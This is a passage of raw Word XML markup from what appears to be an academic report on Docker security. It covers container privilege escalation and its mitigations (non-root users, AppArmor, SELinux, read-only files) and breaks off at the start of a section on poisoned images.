      <w:r w:rsidR="00400F7C">
        <w:t>that are</w:t>
      </w:r>
      <w:r w:rsidR="007E51E8">
        <w:t xml:space="preserve"> not</w:t>
      </w:r>
      <w:r w:rsidR="001D3E8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00951198">
        <w:t xml:space="preserve">appropriately </w:t>
      </w:r>
      <w:r w:rsidR="001D3E8D">
        <w:t>configured</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1296986316"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001E0CD6">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001E0CD6">
            <w:instrText xml:space="preserve"> CITATION DMe14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="001E0CD6">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[49]</w:t>
          </w:r>
          <w:r w:rsidR="001E0CD6">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001D3E8D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00464CCD">
        <w:t xml:space="preserve"> Unlike VMs, </w:t>
      </w:r>
      <w:r w:rsidR="00732B41">
        <w:t>containers share the same kernel with the host.</w:t>
      </w:r>
      <w:r w:rsidR="00715495">
        <w:t xml:space="preserve"> Consequently, </w:t>
      </w:r>
      <w:r w:rsidR="00A94501">
        <w:t xml:space="preserve">this can </w:t>
      </w:r>
      <w:r w:rsidR="00F85ED7">
        <w:t xml:space="preserve">create </w:t>
      </w:r>
      <w:r w:rsidR="00A94501">
        <w:t xml:space="preserve">security threat </w:t>
      </w:r>
      <w:r w:rsidR="00DD6969">
        <w:t xml:space="preserve">either </w:t>
      </w:r>
      <w:r w:rsidR="005217CB">
        <w:t>from the host or containers</w:t>
      </w:r>
      <w:r w:rsidR="002920F4">
        <w:t xml:space="preserve">, increasing the attack surface </w:t>
      </w:r>
      <w:r w:rsidR="00C07B2B">
        <w:t xml:space="preserve">on containers compared to </w:t>
      </w:r>
      <w:r w:rsidR="00F044EE">
        <w:t>VMs.</w:t>
      </w:r>
      <w:r w:rsidR="00A053F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D6039E">
        <w:t xml:space="preserve">In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00DD41FA">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F31441">
        <w:t>architecture</w:t>
      </w:r>
      <w:r w:rsidR="00DD41FA">
        <w:t xml:space="preserve"> of Docker containers is </w:t>
      </w:r>
      <w:r w:rsidR="00F31441">
        <w:t xml:space="preserve">based upon </w:t>
      </w:r>
      <w:r w:rsidR="00E90E24">
        <w:t>an open</w:t>
      </w:r>
      <w:r w:rsidR="002D7771">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E90E24">
        <w:t xml:space="preserve">source </w:t>
      </w:r>
      <w:r w:rsidR="00F31441">
        <w:t>LXC technology</w:t>
      </w:r>
      <w:r w:rsidR="0095575A">
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidR="009B3F7C">
        <w:t xml:space="preserve">increases </w:t>
      </w:r>
      <w:r w:rsidR="00F85E4D">
        <w:t>the vulnerability of Docker systems</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="639847822"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007907EF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007907EF">
            <w:instrText xml:space="preserve"> CITATION XXu20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="007907EF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[50]</w:t>
          </w:r>
          <w:r w:rsidR="007907EF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F85E4D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000115B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E5E3B" w14:textId="049365E7" w:rsidR="00E0682D" w:rsidRDefault="000115B6" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">In general, Docker security </w:t>
      </w:r>
      <w:r w:rsidR="0085589B">
        <w:t>threats and vulnerabilities can be ad</w:t>
      </w:r>
      <w:r w:rsidR="00520D6A">
        <w:t>dressed</w:t>
      </w:r>
      <w:r w:rsidR="0085589B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00520D6A">
        <w:t xml:space="preserve">and classified </w:t>
      </w:r>
      <w:r w:rsidR="00153A1A">
        <w:t xml:space="preserve">to the various </w:t>
      </w:r>
      <w:r w:rsidR="004F65A3">
        <w:t>types of known attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00F94B7D">
        <w:t xml:space="preserve"> Docker security </w:t>
      </w:r>
      <w:r w:rsidR="008D069C">
        <w:t xml:space="preserve">issues </w:t>
      </w:r>
      <w:r w:rsidR="00F94B7D">
        <w:t xml:space="preserve">can be </w:t>
      </w:r>
      <w:r w:rsidR="004A6333">
        <w:t xml:space="preserve">examined </w:t>
      </w:r>
      <w:r w:rsidR="00A16D5D">
        <w:t xml:space="preserve">on both sides of </w:t>
      </w:r>
      <w:r w:rsidR="00770931">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00A20976">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00770931">
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00DB51AB">
        <w:t>, namely outside and inside attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00813242">
        <w:t xml:space="preserve"> The outside attack occurs when</w:t>
      </w:r>
      <w:r w:rsidR="00042A3E">
        <w:t xml:space="preserve"> threat actors gain access from outside the Docker system, whereas the inside </w:t>
      </w:r>
      <w:r w:rsidR="00AB00F3">
        <w:t xml:space="preserve">attack </w:t>
      </w:r>
      <w:r w:rsidR="003734B9">
        <w:t xml:space="preserve">happens </w:t>
      </w:r>
      <w:r w:rsidR="00D71184">
        <w:t xml:space="preserve">when </w:t>
      </w:r>
      <w:r w:rsidR="0069049F">
        <w:t xml:space="preserve">the attacker is </w:t>
      </w:r>
      <w:r w:rsidR="006C22F9">
        <w:t xml:space="preserve">trying to gain access maliciously </w:t>
      </w:r>
      <w:r w:rsidR="00617FAB">
        <w:t>from inside</w:t>
      </w:r>
      <w:r w:rsidR="002E2F72">
        <w:t xml:space="preserve"> the Docker </w:t>
      </w:r>
      <w:r w:rsidR="00617FAB">
        <w:t>environment</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1697921313"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B64D20">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B64D20">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B64D20">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00B64D20">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="002E2F72">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E26A3">
        <w:t xml:space="preserve"> Also, </w:t>
      </w:r>
      <w:r w:rsidR="001E7149">
        <w:t xml:space="preserve">Docker security issues can be discussed </w:t>
      </w:r>
      <w:r w:rsidR="00D1290C">
        <w:t>with its</w:t>
      </w:r>
      <w:r w:rsidR="001B3C8D">
        <w:t xml:space="preserve"> various</w:t>
      </w:r>
      <w:r w:rsidR="00D1290C">
        <w:t xml:space="preserve"> components</w:t>
      </w:r>
      <w:r w:rsidR="001B3C8D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E73BDE">
        <w:t>Docker daemon</w:t>
      </w:r>
      <w:r w:rsidR="00A43C22">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E6609A">
        <w:t>Docker registry</w:t>
      </w:r>
      <w:r w:rsidR="00A43C22">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A43C22">
        <w:lastRenderedPageBreak/>
        <w:t>images, and containers</w:t>
      </w:r>
      <w:r w:rsidR="00BE71DF">
        <w:t>, as discussed in the above</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-374464548"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001905AC">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001905AC">
            <w:instrText xml:space="preserve"> CITATION DHu19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="001905AC">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
          <w:r w:rsidR="001905AC">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D1290C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004200EB">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00870C71">
        <w:t>various</w:t>
      </w:r>
      <w:r w:rsidR="004200EB">
        <w:t xml:space="preserve"> types of</w:t>
      </w:r>
      <w:r w:rsidR="00C0420F">
        <w:t xml:space="preserve"> known</w:t>
      </w:r>
      <w:r w:rsidR="004200EB">
        <w:t xml:space="preserve"> attacks on</w:t>
      </w:r>
      <w:r w:rsidR="00F71F6D">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="004200EB">
        <w:t xml:space="preserve"> Docker system are outlined </w:t>
      </w:r>
      <w:r w:rsidR="007661E3">
        <w:t>as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0882F5" w14:textId="4976BD79" w:rsidR="00C45BEE" w:rsidRDefault="00961AAC" w:rsidP="00961AAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc87032900"/>
      <w:r>
        <w:t xml:space="preserve">Container Privilege </w:t>
      </w:r>
      <w:r w:rsidR="00221F7E">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00FB43A5">
        <w:t>scalations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="1E49F18B" w14:textId="7B2566FE" w:rsidR="00D02ED3" w:rsidRDefault="000535EE" w:rsidP="00B01619">
      <w:r>
        <w:t xml:space="preserve">Containers are </w:t>
      </w:r>
      <w:r w:rsidR="00CF164C">
        <w:t>lightweight running instances of a</w:t>
      </w:r>
      <w:r w:rsidR="001A6178">
        <w:t xml:space="preserve"> run time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application in which they</w:t>
      </w:r>
      <w:r w:rsidR="00F91637">
        <w:t xml:space="preserve"> all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> share the kernel with the host.</w:t>
      </w:r>
      <w:r w:rsidR="00C3463E">
        <w:t xml:space="preserve"> Simply put, a container </w:t>
      </w:r>
      <w:r w:rsidR="00F66223">
        <w:t xml:space="preserve">contains packages </w:t>
      </w:r>
      <w:r w:rsidR="005F2FA0">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00F66223">
        <w:t>all the necessary</w:t>
      </w:r>
      <w:r w:rsidR="00D6444F">
        <w:t xml:space="preserve"> libraries and </w:t>
      </w:r>
      <w:r w:rsidR="00FB1124">
        <w:t xml:space="preserve">dependencies for an application to run </w:t>
      </w:r>
      <w:r w:rsidR="005F2FA0">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00866F99">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00480737">
        <w:t>secluded environment.</w:t>
      </w:r>
      <w:r w:rsidR="008E7651">
        <w:t xml:space="preserve"> The Docker engine </w:t>
      </w:r>
      <w:r w:rsidR="00DD2C93">
        <w:t>uses various Linux kernel features</w:t>
      </w:r>
      <w:r w:rsidR="001971F6">
        <w:t xml:space="preserve"> to isolate multiple </w:t>
      </w:r>
      <w:r w:rsidR="001D24AC">
        <w:t>containers running inside a single host.</w:t>
      </w:r>
      <w:r w:rsidR="00CC1173">
        <w:t xml:space="preserve"> However, in situations </w:t>
      </w:r>
      <w:r w:rsidR="00EE5CA3">
        <w:t>running a vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00502DF4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C36DAC">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidR="00A53F08">
        <w:t>with a privilege flag</w:t>
      </w:r>
      <w:r w:rsidR="008D4F5A">
        <w:t xml:space="preserve"> container c</w:t>
      </w:r>
      <w:r w:rsidR="009C7D3E">
        <w:t xml:space="preserve">ould </w:t>
      </w:r>
      <w:r w:rsidR="00505C3E">
        <w:t xml:space="preserve">allow </w:t>
      </w:r>
      <w:r w:rsidR="00EA3696">
        <w:t xml:space="preserve">cybercriminals to gain access to </w:t>
      </w:r>
      <w:r w:rsidR="007A0E50">
        <w:t>the host’s critical resources</w:t>
      </w:r>
      <w:r w:rsidR="00A15F43">
        <w:t xml:space="preserve"> with root access</w:t>
      </w:r>
      <w:r w:rsidR="007A0E50">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006E6520">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA5A4B">
        <w:t xml:space="preserve">This means that an attacker will be able to conduct various capabilities inside the host or other containers with root privilege. </w:t>
      </w:r>
      <w:r w:rsidR="006E6520">
        <w:t>In s</w:t>
      </w:r>
      <w:r w:rsidR="002645EA">
        <w:t xml:space="preserve">uch </w:t>
      </w:r>
      <w:r w:rsidR="006E6520">
        <w:t xml:space="preserve">cases, </w:t>
      </w:r>
      <w:r w:rsidR="00025546">
        <w:t xml:space="preserve">the potential attack </w:t>
      </w:r>
      <w:r w:rsidR="00DF1D21">
        <w:t xml:space="preserve">surface is </w:t>
      </w:r>
      <w:r w:rsidR="003D5F4D">
        <w:t>far-reaching</w:t>
      </w:r>
      <w:r w:rsidR="00DF1D21">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00E229C3">
        <w:t xml:space="preserve"> allows </w:t>
      </w:r>
      <w:r w:rsidR="00605956">
        <w:t xml:space="preserve">the attacker to compromise </w:t>
      </w:r>
      <w:r w:rsidR="00943682">
        <w:t xml:space="preserve">other running containers </w:t>
      </w:r>
      <w:r w:rsidR="004C3B4E">
        <w:t>and the host.</w:t>
      </w:r>
      <w:r w:rsidR="00FA20BE">
        <w:t xml:space="preserve"> Such an attack is </w:t>
      </w:r>
      <w:r w:rsidR="001C1D65">
        <w:t>named</w:t>
      </w:r>
      <w:r w:rsidR="00FA20BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003801D4">
        <w:t>privilege escalation</w:t>
      </w:r>
      <w:r w:rsidR="00092C76">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003E4841">
        <w:t xml:space="preserve">allowing malicious users </w:t>
      </w:r>
      <w:r w:rsidR="00D70AA4">
        <w:t>to run as root users</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="934636834"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001A79C9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001A79C9">
            <w:instrText xml:space="preserve"> CITATION TCo16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B42A74">
            <w:instrText xml:space="preserve"> \m ZJi17</w:instrText>
          </w:r>
          <w:r w:rsidR="00B67508">
            <w:instrText xml:space="preserve"> \m MDe19</w:instrText>
          </w:r>
          <w:r w:rsidR="00EE4BE8">
            <w:instrText xml:space="preserve"> \m Lin18</w:instrText>
          </w:r>
          <w:r w:rsidR="001A79C9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[46, 52, 53, 54]</w:t>
          </w:r>
          <w:r w:rsidR="001A79C9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D70AA4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DCCC9" w14:textId="0C778EAD" w:rsidR="00B67508" w:rsidRDefault="0095660E" w:rsidP="00B01619">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00DD5FBA">
        <w:t>he privilege attack can be mitigated</w:t>
      </w:r>
      <w:r w:rsidR="009C5D68">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="00EA5B1D">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="009C5D68">
        <w:t>Linux hardening techniques</w:t>
      </w:r>
      <w:r>
        <w:t>, me</w:t>
      </w:r>
      <w:r w:rsidR="00EA5B1D">
        <w:t>ntioned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00907AFB">
        <w:t>bove</w:t>
      </w:r>
      <w:r w:rsidR="009C5D68">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00307405">
        <w:t xml:space="preserve"> According to </w:t>
      </w:r>
      <w:r w:rsidR="009E4E3A">
        <w:t>OWASP i</w:t>
      </w:r>
      <w:r w:rsidR="000C3092">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1754938272"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="000C3092">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000C3092">
            <w:instrText xml:space="preserve"> CITATION OWA21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="000C3092">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
          <w:r w:rsidR="000C3092">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="000C3092">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00492875">
        <w:t xml:space="preserve"> it is recommended </w:t>
      </w:r>
      <w:r w:rsidR="001031EC">
        <w:t xml:space="preserve">to run a container </w:t>
      </w:r>
      <w:r w:rsidR="0000644E">
        <w:t xml:space="preserve">process </w:t>
      </w:r>
      <w:r w:rsidR="00CA4C56">
        <w:t xml:space="preserve">under a limited capabilities </w:t>
      </w:r>
      <w:r w:rsidR="002E35D7">
        <w:t>and non-privileged user</w:t>
      </w:r>
      <w:r w:rsidR="00BF1731">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00286EA9">
        <w:t xml:space="preserve"> Docker also </w:t>
      </w:r>
      <w:r w:rsidR="00416AAE">
        <w:t xml:space="preserve">provides </w:t>
      </w:r>
      <w:r w:rsidR="003A3680">
        <w:t>additional</w:t>
      </w:r>
      <w:r w:rsidR="00753995">
        <w:t xml:space="preserve"> options to enhance its security</w:t>
      </w:r>
      <w:r w:rsidR="00661235">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00387232">
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1780474231"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0078110D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0078110D">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="0078110D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35]</w:t>
          </w:r>
          <w:r w:rsidR="0078110D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00A40CC2">
        <w:t xml:space="preserve">, it is strongly suggested to </w:t>
      </w:r>
      <w:r w:rsidR="00F5308C">
        <w:t xml:space="preserve">run the Docker engine under </w:t>
      </w:r>
      <w:r w:rsidR="0076702E">
        <w:t>the Linux kernel features, including AppArmor</w:t>
      </w:r>
      <w:r w:rsidR="00B41990">
        <w:t xml:space="preserve"> and SELinux.</w:t>
      </w:r>
      <w:r w:rsidR="005725C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001753D2">
        <w:t xml:space="preserve">In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00C01C00">
        <w:t xml:space="preserve">non-trusted applications </w:t>
      </w:r>
      <w:r w:rsidR="00DF47D8">
        <w:t xml:space="preserve">should run </w:t>
      </w:r>
      <w:r w:rsidR="00907D7F">
        <w:t>under non-root user</w:t>
      </w:r>
      <w:r w:rsidR="00DA20B6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00907D7F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005456E4">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00DA20B6">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="005456E4">
        <w:t xml:space="preserve">separated from </w:t>
      </w:r>
      <w:r w:rsidR="002D1886">
        <w:t>the trusted groups.</w:t>
      </w:r>
      <w:r w:rsidR="00780036">
        <w:t xml:space="preserve"> Further, </w:t>
      </w:r>
      <w:r w:rsidR="007F383C">
        <w:t xml:space="preserve">container files </w:t>
      </w:r>
      <w:r w:rsidR="002630A7">
        <w:t>should run in read onl</w:t>
      </w:r>
      <w:r w:rsidR="00D63A90">
        <w:t xml:space="preserve">y mode to prevent privilege </w:t>
      </w:r>
      <w:r w:rsidR="007443C6">
        <w:t>and kernel attacks</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-112830600"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00DA6E39">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DA6E39">
            <w:instrText xml:space="preserve"> CITATION EWi14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E87FEE">
            <w:instrText xml:space="preserve"> \m SUp16</w:instrText>
          </w:r>
          <w:r w:rsidR="00DA6E39">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[56, 57]</w:t>
          </w:r>
          <w:r w:rsidR="00DA6E39">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007443C6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F80AE6">
        <w:t xml:space="preserve"> Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="00C1714B">
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00593AE9">
        <w:t>ning</w:t>
      </w:r>
      <w:r w:rsidR="00C1714B">
        <w:t xml:space="preserve"> a container with </w:t>
      </w:r>
      <w:r w:rsidR="00593AE9">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00C1714B">
        <w:t>non-</w:t>
      </w:r>
      <w:r w:rsidR="005E1AB4">
        <w:t xml:space="preserve">root user is </w:t>
      </w:r>
      <w:r w:rsidR="00DF7C9C">
        <w:t>crucial to prevent privilege escalation attacks</w:t>
      </w:r>
      <w:r w:rsidR="00895EEB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261DF3B9" w14:textId="35CC57EC" w:rsidR="009E608B" w:rsidRDefault="00582216" w:rsidP="000E4D30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc87032901"/>
      <w:r>
        <w:t xml:space="preserve">Poisoned </w:t>
      </w:r>
      <w:r w:rsidR="000E4D30">
        <w:t>Images</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="7B55C48F" w14:textId="3D480EBB" w:rsidR="001351C8" w:rsidRDefault="00C953C6" w:rsidP="001351C8">
      <w:r>
        <w:t xml:space="preserve">Images are the blueprint </w:t>
      </w:r>
      <w:r w:rsidR="004D1854">
        <w:t xml:space="preserve">with instructions to </w:t>
      </w:r>
      <w:r w:rsidR="008348A3">
        <w:t xml:space="preserve">build </w:t>
      </w:r>
      <w:r w:rsidR="0033309A">
        <w:t>a container</w:t>
      </w:r>
      <w:r w:rsidR="004C736F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00986904">
        <w:t xml:space="preserve"> As </w:t>
      </w:r>
      <w:r w:rsidR="007453BA">
        <w:t xml:space="preserve">discussed above, images </w:t>
      </w:r>
      <w:r w:rsidR="00863C67">
        <w:t xml:space="preserve">can be shared </w:t>
      </w:r>
      <w:r w:rsidR="00025B41">
        <w:t>via private or public repositories</w:t>
      </w:r>
      <w:r w:rsidR="005B150F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DE5CF3">
        <w:t xml:space="preserve"> However, Docker </w:t>
      </w:r>
      <w:r w:rsidR="00D75E9E">
        <w:t xml:space="preserve">uses its </w:t>
      </w:r>
      <w:r w:rsidR="00815AF7">
        <w:t>public repository</w:t>
      </w:r>
      <w:r w:rsidR="00072490">
        <w:t xml:space="preserve"> Docker Hub</w:t>
      </w:r>
      <w:r w:rsidR="000E0DC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072490">
        <w:t>by default.</w:t>
      </w:r>
      <w:r w:rsidR="00FB1AC6">
        <w:t xml:space="preserve"> Users interact </w:t>
      </w:r>
      <w:r w:rsidR="00910153">
        <w:t xml:space="preserve">with the registry </w:t>
      </w:r>
      <w:r w:rsidR="0033593D">
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="00473FEC">
        <w:t xml:space="preserve"> an API</w:t>
      </w:r>
      <w:r w:rsidR="0033593D">
        <w:t xml:space="preserve"> through the internet</w:t>
      </w:r>
      <w:r w:rsidR="00473FEC">
        <w:t xml:space="preserve"> to pull or push images remotely</w:t>
      </w:r>
      <w:r w:rsidR="001F615B">
        <w:t xml:space="preserve"> via HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00473FEC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007B4E4A">
        <w:t xml:space="preserve"> This implies that </w:t>
      </w:r>
      <w:r w:rsidR="00CE0408">
        <w:t>the API is exposed to the internet</w:t>
      </w:r>
      <w:r w:rsidR="00AB5E74">
        <w:t>, increasing the p</w:t>
      </w:r>
      <w:r w:rsidR="00AF1A4A">
        <w:t xml:space="preserve">otential </w:t>
      </w:r>
      <w:r w:rsidR="00CF52F0">
        <w:t xml:space="preserve">danger </w:t>
      </w:r>
      <w:r w:rsidR="00AF1A4A">
        <w:t>to hijackers.</w:t>
      </w:r>
      <w:r w:rsidR="00CF52F0">
        <w:t xml:space="preserve"> As a result</w:t>
      </w:r>
      <w:r w:rsidR="00B65453">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
